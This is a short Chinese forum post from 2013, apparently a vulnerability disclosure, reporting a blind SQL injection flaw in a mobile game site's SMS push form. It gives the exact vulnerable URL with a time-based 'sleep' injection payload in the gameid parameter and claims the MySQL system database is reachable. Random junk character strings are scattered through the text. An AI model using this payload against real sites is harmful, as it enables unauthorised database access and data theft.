简要描述:9 n0 c Z/ Y( x1 F% a9 g4 x9 X
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
! ]3 h, A. R; B6 d
- ~3 E8 }7 Q) t+ P详细说明:) n5 _/ r# `% [4 Z: `/ A
存在SQL盲注url:1 H b5 B$ O! A
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
' U5 O5 @+ _% vhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
' q" C6 {6 v) A8 r2 Jhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png' J- G# Y# A) Q
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg H/ T' l2 L, R& U$ G
, P6 N/ v4 p, V4 Q! o能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对